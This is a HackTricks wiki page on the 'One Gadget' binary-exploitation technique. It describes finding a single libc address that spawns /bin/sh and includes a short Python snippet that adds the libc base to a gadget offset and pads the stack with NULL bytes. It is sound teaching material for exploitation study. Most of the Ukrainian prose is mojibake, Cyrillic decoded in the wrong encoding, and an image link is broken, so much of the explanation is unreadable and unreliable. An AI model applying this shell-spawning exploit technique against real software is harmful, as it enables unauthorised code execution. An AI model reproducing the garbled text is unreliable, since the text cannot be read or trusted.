# One Gadget
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## Basic Information
[**One Gadget**](https://github.com/david942j/one\_gadget) Π΄ΠΎΠ·Π²ΠΎΠ»ΡΡ ΠΎΡΡΠΈΠΌΠ°ΡΠΈ ΠΎΠ±ΠΎΠ»ΠΎΠ½ΠΊΡ Π·Π°ΠΌΡΡΡΡ Π²ΠΈΠΊΠΎΡΠΈΡΡΠ°Π½Π½Ρ **system** ΡΠ° **"/bin/sh". One Gadget** Π·Π½Π°ΠΉΠ΄Π΅ Π² Π±ΡΠ±Π»ΡΠΎΡΠ΅ΡΡ libc ΡΠΏΠΎΡΡΠ± ΠΎΡΡΠΈΠΌΠ°ΡΠΈ ΠΎΠ±ΠΎΠ»ΠΎΠ½ΠΊΡ (`execve("/bin/sh")`), Π²ΠΈΠΊΠΎΡΠΈΡΡΠΎΠ²ΡΡΡΠΈ Π»ΠΈΡΠ΅ ΠΎΠ΄Π½Ρ **Π°Π΄ΡΠ΅ΡΡ**.\
ΠΠ΄Π½Π°ΠΊ, Π·Π°Π·Π²ΠΈΡΠ°ΠΉ Ρ Π΄Π΅ΡΠΊΡ ΠΎΠ±ΠΌΠ΅ΠΆΠ΅Π½Π½Ρ, Π½Π°ΠΉΠΏΠΎΡΠΈΡΠ΅Π½ΡΡΡ ΡΠ° Π»Π΅Π³ΠΊΡ Π΄Π»Ρ ΡΠ½ΠΈΠΊΠ½Π΅Π½Π½Ρ ΡΠ°ΠΊΡ, ΡΠΊ `[rsp+0x30] == NULL`. ΠΡΠΊΡΠ»ΡΠΊΠΈ Π²ΠΈ ΠΊΠΎΠ½ΡΡΠΎΠ»ΡΡΡΠ΅ Π·Π½Π°ΡΠ΅Π½Π½Ρ Π²ΡΠ΅ΡΠ΅Π΄ΠΈΠ½Ρ **RSP**, Π²Π°ΠΌ ΠΏΡΠΎΡΡΠΎ ΠΏΠΎΡΡΡΠ±Π½ΠΎ Π½Π°Π΄ΡΡΠ»Π°ΡΠΈ ΡΠ΅ ΠΊΡΠ»ΡΠΊΠ° Π·Π½Π°ΡΠ΅Π½Ρ NULL, ΡΠΎΠ± ΡΠ½ΠΈΠΊΠ½ΡΡΠΈ ΠΎΠ±ΠΌΠ΅ΠΆΠ΅Π½Π½Ρ.
.png>)
```python
ONE_GADGET = libc.address + 0x4526a
rop2 = base + p64(ONE_GADGET) + "\x00"*100
```
ΠΠΎ Π°Π΄ΡΠ΅ΡΠΈ, Π²ΠΊΠ°Π·Π°Π½ΠΎΡ One Gadget, ΠΏΠΎΡΡΡΠ±Π½ΠΎ **Π΄ΠΎΠ΄Π°ΡΠΈ Π±Π°Π·ΠΎΠ²Ρ Π°Π΄ΡΠ΅ΡΡ, Π΄Π΅ Π·Π°Π²Π°Π½ΡΠ°ΠΆΠ΅Π½ΠΎ `libc`**.
{% hint style="success" %}
One Gadget Ρ **ΡΡΠ΄ΠΎΠ²ΠΎΡ Π΄ΠΎΠΏΠΎΠΌΠΎΠ³ΠΎΡ Π΄Π»Ρ ΡΠ΅Ρ
Π½ΡΠΊ Arbitrary Write 2 Exec** Ρ ΠΌΠΎΠΆΠ΅ **ΡΠΏΡΠΎΡΡΠΈΡΠΈ ROP Π»Π°Π½ΡΡΠ³ΠΈ**, ΠΎΡΠΊΡΠ»ΡΠΊΠΈ Π²Π°ΠΌ ΠΏΠΎΡΡΡΠ±Π½ΠΎ Π»ΠΈΡΠ΅ Π²ΠΈΠΊΠ»ΠΈΠΊΠ°ΡΠΈ ΠΎΠ΄Π½Ρ Π°Π΄ΡΠ΅ΡΡ (Ρ Π²ΠΈΠΊΠΎΠ½Π°ΡΠΈ Π²ΠΈΠΌΠΎΠ³ΠΈ).
{% endhint %}
{% hint style="success" %}
ΠΠΈΠ²ΡΠ°ΠΉΡΠ΅ ΡΠ° ΠΏΡΠ°ΠΊΡΠΈΠΊΡΠΉΡΠ΅ AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
ΠΠΈΠ²ΡΠ°ΠΉΡΠ΅ ΡΠ° ΠΏΡΠ°ΠΊΡΠΈΠΊΡΠΉΡΠ΅ GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
ΠΡΠ΄ΡΡΠΈΠΌΠ°ΡΠΈ HackTricks
* ΠΠ΅ΡΠ΅Π²ΡΡΡΠ΅ [**ΠΏΠ»Π°Π½ΠΈ ΠΏΡΠ΄ΠΏΠΈΡΠΊΠΈ**](https://github.com/sponsors/carlospolop)!
* **ΠΡΠΈΡΠ΄Π½ΡΠΉΡΠ΅ΡΡ Π΄ΠΎ** π¬ [**Π³ΡΡΠΏΠΈ Discord**](https://discord.gg/hRep4RUj7f) Π°Π±ΠΎ [**Π³ΡΡΠΏΠΈ Telegram**](https://t.me/peass) Π°Π±ΠΎ **ΡΠ»ΡΠ΄ΠΊΡΠΉΡΠ΅** Π·Π° Π½Π°ΠΌΠΈ Π² **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **ΠΡΠ»ΡΡΡΡΡ Ρ
Π°ΠΊΠ΅ΡΡΡΠΊΠΈΠΌΠΈ ΡΡΡΠΊΠ°ΠΌΠΈ, Π½Π°Π΄ΡΠΈΠ»Π°ΡΡΠΈ PR Π΄ΠΎ** [**HackTricks**](https://github.com/carlospolop/hacktricks) ΡΠ° [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ΡΠ΅ΠΏΠΎΠ·ΠΈΡΠΎΡΡΡΠ² Π½Π° github.
{% endhint %}